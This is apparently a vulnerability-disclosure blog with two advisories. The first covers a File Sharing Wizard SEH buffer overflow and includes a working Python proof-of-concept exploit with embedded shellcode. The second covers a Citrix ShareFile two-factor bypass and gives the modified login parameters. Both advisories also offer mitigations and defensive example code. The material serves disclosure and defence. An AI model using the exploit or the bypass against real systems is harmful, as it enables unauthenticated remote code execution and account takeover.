Friday, November 08, 2019

CVE-2019-18655: FILE SHARING WIZARD VERSION 1.5 - GET SEH BASED BUFFER OVERFLOW

Several hours of analyzing multiple binaries for vulnerabilities led to the identification of a Structured Exception Handler (SEH)-based buffer overflow vulnerability in the File Sharing Wizard binary, version 1.5.0. An unauthenticated attacker is able to achieve remote code execution (RCE) by sending a specially crafted HTTP GET request containing a malicious payload in the request's URL.

This vulnerability stems from improper input validation and bounds checking in the application’s request handling routines. When the input exceeds the expected buffer size, the overflow overwrites the SEH chain, enabling arbitrary code execution.

The vulnerability resembles previously disclosed issues such as:

  • CVE-2019-17415

  • CVE-2019-16724

  • CVE-2010-2331

In successful exploitation scenarios, attackers may gain shell access to the target system and execute arbitrary OS-level commands—without authentication.

Exploitation Steps

An attacker can exploit the vulnerability through the following steps:

  1. Identify a target running File Sharing Wizard v1.5.0 and accessible via HTTP.

  2. Craft a malicious URL containing a buffer overflow payload that corrupts the SEH handler.

  3. Send the HTTP GET request to the target using tools like Python scripts or exploit frameworks.

  4. Trigger the buffer overflow, leading to SEH chain hijacking and redirection of execution to attacker-controlled shellcode.

  5. Gain remote access via a command shell or reverse shell, with the same privileges as the running application.


A Proof of Concept (PoC) exploit is provided below:

#!/usr/bin/python
################### PoC ###################
import socket
import os
import sys

# Bad chars: \x00\x20
#
# nSEH value: 0x9090eb08 (JMP short)
#
# SEH value: 0x7c37576d : pop esi # pop edi # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files\File Sharing Wizard\bin\MSVCR71.dll)

seh = '\x6d\x57\x37\x7c'    # pop pop ret in MSVCR71.dll (little-endian)
nseh = '\x90\x90\xeb\x08'   # short jump over the handler address

# Shellcode
buf = b""
buf += b"\xbe\x8f\x59\xb8\x41\xdb\xd5\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x31\x31\x72\x13\x83\xea\xfc\x03\x72\x80\xbb"
buf += b"\x4d\xbd\x76\xb9\xae\x3e\x86\xde\x27\xdb\xb7\xde\x5c"
buf += b"\xaf\xe7\xee\x17\xfd\x0b\x84\x7a\x16\x98\xe8\x52\x19"
buf += b"\x29\x46\x85\x14\xaa\xfb\xf5\x37\x28\x06\x2a\x98\x11"
buf += b"\xc9\x3f\xd9\x56\x34\xcd\x8b\x0f\x32\x60\x3c\x24\x0e"
buf += b"\xb9\xb7\x76\x9e\xb9\x24\xce\xa1\xe8\xfa\x45\xf8\x2a"
buf += b"\xfc\x8a\x70\x63\xe6\xcf\xbd\x3d\x9d\x3b\x49\xbc\x77"
buf += b"\x72\xb2\x13\xb6\xbb\x41\x6d\xfe\x7b\xba\x18\xf6\x78"
buf += b"\x47\x1b\xcd\x03\x93\xae\xd6\xa3\x50\x08\x33\x52\xb4"
buf += b"\xcf\xb0\x58\x71\x9b\x9f\x7c\x84\x48\x94\x78\x0d\x6f"
buf += b"\x7b\x09\x55\x54\x5f\x52\x0d\xf5\xc6\x3e\xe0\x0a\x18"
buf += b"\xe1\x5d\xaf\x52\x0f\x89\xc2\x38\x45\x4c\x50\x47\x2b"
buf += b"\x4e\x6a\x48\x1b\x27\x5b\xc3\xf4\x30\x64\x06\xb1\xcf"
buf += b"\x2e\x0b\x93\x47\xf7\xd9\xa6\x05\x08\x34\xe4\x33\x8b"
buf += b"\xbd\x94\xc7\x93\xb7\x91\x8c\x13\x2b\xeb\x9d\xf1\x4b"
buf += b"\x58\x9d\xd3\x2f\x3f\x0d\xbf\x81\xda\xb5\x5a\xde"

# 1035 bytes of padding reach the SEH record; the remainder pads the request to a fixed length
poc = 'A' * 1035 + nseh + seh + '\x90' * 10 + buf + '\x90' * (3949 - len(buf))
payload = 'GET //.:/' + poc + ' HTTP/1.0\r\n\r\n'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.216.135", 80))
s.send(payload)
s.close()

Recommended Mitigations:

  • Immediately restrict or disable access to File Sharing Wizard instances exposed to untrusted networks.

  • Apply vendor patches or consider replacing the software if no fix is available.

  • Implement network-based intrusion prevention systems (IPS) to detect and block exploit patterns.

  • Monitor logs and network traffic for anomalous GET requests targeting the service.
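The last two mitigations call for spotting anomalous GET requests before or as they reach the service. The following Python script is an added example written for this post (it is not the author's code and not part of the advisory) showing what such a check can key on: the overflow request above has a request target of several thousand bytes, made mostly of one repeated byte, and it carries non-printable bytes that never appear in a legitimate File Sharing Wizard URL. The thresholds (1024-byte target, 64-byte run) and the sample requests are assumptions constructed for the example; the second sample mirrors the PoC's request shape with inert filler in place of any payload.

```python
"""Flag oversized or sled-like HTTP request lines (added example, not from the advisory)."""
import re

# Assumed thresholds: tune to the longest URL the service legitimately accepts.
MAX_TARGET_LEN = 1024   # the PoC request target is over 5,000 bytes
MIN_REPEAT_RUN = 64     # one byte repeated this often looks like padding or a NOP sled

REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/(\d\.\d)\r?\n")
REPEAT_RUN = re.compile(rb"(.)\1{%d,}" % (MIN_REPEAT_RUN - 1), re.DOTALL)


def inspect_request(raw: bytes) -> dict:
    """Return a verdict for one raw HTTP request; only the request line is needed."""
    m = REQUEST_LINE.match(raw)
    if not m:
        return {"method": None, "ok": False, "reasons": ["unparseable request line"]}
    method, target, _version = m.groups()
    reasons = []
    if len(target) > MAX_TARGET_LEN:
        reasons.append(f"request target length {len(target)} exceeds {MAX_TARGET_LEN}")
    # Anything outside 0x21..0x7e (printable, non-space) is not URL-safe text
    if any(b < 0x21 or b > 0x7e for b in target):
        reasons.append("non-printable bytes in request target")
    run = REPEAT_RUN.search(target)
    if run:
        reasons.append(f"byte 0x{run.group(1)[0]:02x} repeated {len(run.group(0))} times")
    return {"method": method.decode(), "ok": not reasons, "reasons": reasons}


def scan_requests(requests) -> list:
    """Inspect a batch of raw requests, e.g. reassembled from a capture."""
    return [inspect_request(r) for r in requests]


# Constructed sample traffic: one ordinary download, one request with the PoC's
# shape but harmless filler, and one short target carrying non-printable bytes.
SAMPLE_REQUESTS = [
    b"GET /share/report.pdf HTTP/1.1\r\nHost: fileshare.example.test\r\n\r\n",
    b"GET //.:/" + b"A" * 1200 + b" HTTP/1.0\r\n\r\n",
    b"GET /dl?n=" + b"\x90" * 80 + b" HTTP/1.1\r\n\r\n",
]

if __name__ == "__main__":
    for verdict in scan_requests(SAMPLE_REQUESTS):
        print("OK   " if verdict["ok"] else "ALERT", verdict["method"], "; ".join(verdict["reasons"]))
```

Run the script on reassembled request lines from a capture or on a web proxy's raw access log; a match on any one reason is enough to alert, since none of the three patterns occurs in normal use of this service.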

Conclusion

This vulnerability in File Sharing Wizard v1.5.0 represents a severe security risk due to its unauthenticated nature and potential for full system compromise.

Reporting Information:

CVE Identifier: CVE-2019-18655
CVSS Score: 9.8
Affected Versions: File Sharing Wizard v1.5.0
Product URL: https://file-sharing-wizard.soft112.com/
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-18655
Reported By: Armando Huesca Prida
Tested on: 
  • Microsoft Windows Vista Ultimate 6.0.6002 Service Pack 2 Build 6002 
  • Microsoft Windows 7 Professional 6.1.7601 Service Pack 1 Build 7601 

Thursday, May 02, 2019

CVE 2019-7218: CITRIX SHAREFILE TWO FACTOR AUTHENTICATION DOWNGRADE TO ONE FACTOR

Today’s post reveals a critical vulnerability affecting Citrix ShareFile versions up to and including 19.1. The application implements two-phase authentication in which the OTP (One-Time Password) validation occurs independently of username/password verification.


Citrix ShareFile Application v.19.1


Under specific conditions, an attacker who gains access to a victim’s OTP generator (physical token or virtual app like Google Authenticator) can bypass the first phase of authentication—the username and password—and gain access by submitting only a username and valid OTP.

This behavior effectively downgrades 2FA to 1FA, allowing unauthorized access without knowing the user’s password, provided the OTP device is compromised.

A deeper analysis shows that the flaw lies in the server’s authentication flow logic, which fails to properly enforce the required sequence of authentication phases. Specifically, the server does not verify that the user has successfully completed phase 1 (username/password) before accepting and validating phase 2 (OTP).

As a result, if an attacker gains access to a user’s offline OTP token—whether physical or virtual—they can initiate a login session by submitting only the username and a valid OTP. The server mistakenly considers the OTP sufficient for authentication, thereby bypassing password validation entirely.

It is important to note that this vulnerability is only exploitable when:

  • The OTP is generated offline, using a pre-configured shared secret (TOTP/HOTP).

  • The server does not tie OTP validation to a prior successful username/password authentication.

  • OTPs are not generated on demand and sent dynamically (e.g., via SMS or voice).

Exploitation Steps

Here is how the vulnerability can be exploited:

  1. Attacker obtains access to the victim’s OTP source (Google Authenticator, physical token, etc.).

  2. Intercept or recreate a login request, even with invalid or garbage values for the username and password fields.

  3. Modify the request to insert the valid victim’s username and current OTP in place of the original credentials.

  4. Send the modified request to the server.

  5. The server validates the OTP without verifying whether the username/password was correct—granting access.

This attack relies on the incorrect server-side assumption that OTP alone is a sufficient condition for authentication success.

The requests used to exploit this vulnerability are detailed below. First, an attacker intercepts the log-in request submitted with garbage data and uses it as the base for the attack, changing the OTP and Password parameters.


Phase 1 default log-in request and response


Request modifications:

op=webflow-verify and code=[OTP]

If the username/OTP combination is correct (phase 2 succeeds), phase 1 authentication is bypassed and the attacker gains unauthorized access to the application, as shown below:


Evil phase 2 request with modified parameters


The following image serves as evidence of unauthorized access to the web application by exploiting this vulnerability:


Unauthorized access to the application


Recommended Mitigations:

  • Review and correct authentication logic to ensure OTP validation is only triggered after successful password verification.

  • Enforce strict sequencing of authentication phases in all login flows.

  • Log and alert on any login attempts where OTP is accepted without prior successful password authentication.

  • Consider implementing risk-based authentication to detect and block anomalous login flows.

  • Educate users on safeguarding their OTP tokens and treating them as sensitive credentials.
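The root cause described above (the server accepts an OTP for whatever username the phase 2 request names, without checking that phase 1 succeeded for that user) and the first two mitigations (OTP validation only after password verification, strict phase sequencing) are easiest to see side by side in code. The following Python model is an added example written for this post; it is not ShareFile's code and makes no claim about ShareFile's internals. It implements RFC 6238 TOTP over the standard library to stand in for an offline token such as Google Authenticator, a weak flow with the advisory's behaviour, and a hardened flow in which phase 2 is reachable only through a server-side record created by a successful phase 1. The user record, password, TOTP seed and the 300-second pending-login TTL are constructed values.

```python
"""Weak vs hardened two-phase login (added example; not ShareFile's code)."""
import hashlib
import hmac
import struct


def totp(secret: bytes, now: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP (HMAC-SHA1) as produced by an offline token from a shared seed."""
    counter = struct.pack(">Q", now // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"


SALT = b"constructed-salt"          # constructed; real deployments use a per-user random salt


def pw_hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000)


# Constructed user store: password hash plus the enrolled TOTP seed.
USERS = {
    "alice": {"pw": pw_hash("correct horse battery staple"),
              "totp_seed": b"0123456789abcdef0123"},
}


def password_ok(username: str, password: str) -> bool:
    rec = USERS.get(username)
    return rec is not None and hmac.compare_digest(rec["pw"], pw_hash(password))


def otp_ok(username: str, code: str, now: int) -> bool:
    rec = USERS.get(username)
    return rec is not None and hmac.compare_digest(totp(rec["totp_seed"], now), code)


class WeakFlow:
    """Phase 2 trusts the username in the request and never consults phase 1's outcome."""
    def __init__(self):
        self.sessions = {}   # session_id -> state dict

    def phase1(self, session_id: str, username: str, password: str, now: int) -> bool:
        ok = password_ok(username, password)
        self.sessions[session_id] = {"user": username, "pw_verified": ok}
        return ok

    def phase2(self, session_id: str, username: str, code: str, now: int) -> bool:
        # BUG: username + valid OTP is treated as sufficient; session state is ignored
        if otp_ok(username, code, now):
            self.sessions[session_id] = {"user": username, "authenticated": True}
            return True
        return False


class HardenedFlow:
    """Phase 2 needs a pending record that only a successful phase 1 creates; the
    username is taken from that record, so the request cannot supply its own."""
    PENDING_TTL = 300    # assumed: seconds a half-finished login may wait for its OTP

    def __init__(self):
        self.pending = {}        # session_id -> {"user", "issued_at"}
        self.authenticated = {}  # session_id -> username

    def phase1(self, session_id: str, username: str, password: str, now: int) -> bool:
        if not password_ok(username, password):
            return False
        self.pending[session_id] = {"user": username, "issued_at": now}
        return True

    def phase2(self, session_id: str, code: str, now: int) -> bool:
        rec = self.pending.pop(session_id, None)   # single use: a failed OTP restarts the flow
        if rec is None or now - rec["issued_at"] > self.PENDING_TTL:
            return False
        if not otp_ok(rec["user"], code, now):
            return False
        self.authenticated[session_id] = rec["user"]
        return True


def demo(now: int = 1_700_000_000) -> dict:
    """Attacker holds alice's token (so can compute the current OTP) but not her password."""
    stolen_code = totp(USERS["alice"]["totp_seed"], now)
    weak, hard = WeakFlow(), HardenedFlow()
    # Phase 1 with garbage credentials fails in both flows...
    weak.phase1("s1", "garbage", "garbage", now)
    hard.phase1("s1", "garbage", "garbage", now)
    # ...but only the weak flow then accepts username + OTP at phase 2.
    weak_bypass = weak.phase2("s1", "alice", stolen_code, now)
    hardened_bypass = hard.phase2("s1", stolen_code, now)
    # A legitimate login still completes in the hardened flow.
    legit = hard.phase1("s2", "alice", "correct horse battery staple", now) \
        and hard.phase2("s2", stolen_code, now)
    return {"weak_bypass": weak_bypass, "hardened_bypass": hardened_bypass, "hardened_legit": legit}


if __name__ == "__main__":
    print(demo())   # weak_bypass True, hardened_bypass False, hardened_legit True
```

The hardened flow also gives the third mitigation its signal for free: a phase 2 request arriving for a session with no pending record is exactly the event worth logging and alerting on.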

This issue emphasizes the importance of strong backend enforcement of authentication phases, especially in systems relying on token-based 2FA. Organizations should review their implementations immediately to ensure that OTP validation cannot occur independently of password verification. Our team is available to assist with auditing or remediation support as needed.

Conclusion

This vulnerability represents a significant break in the two-factor authentication model, where possession of an OTP device becomes the only required factor, completely bypassing password-based identity verification.

Reporting Information:

CVE Identifier: CVE-2019-7218
CVSS Score: 5.9
Affected Versions: Citrix ShareFile through 19.1
Tested on: Citrix ShareFile version 19.1
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-7218
Product URL: https://www.sharefile.com/
Reported by: Armando Huesca Prida, Andrea Pessione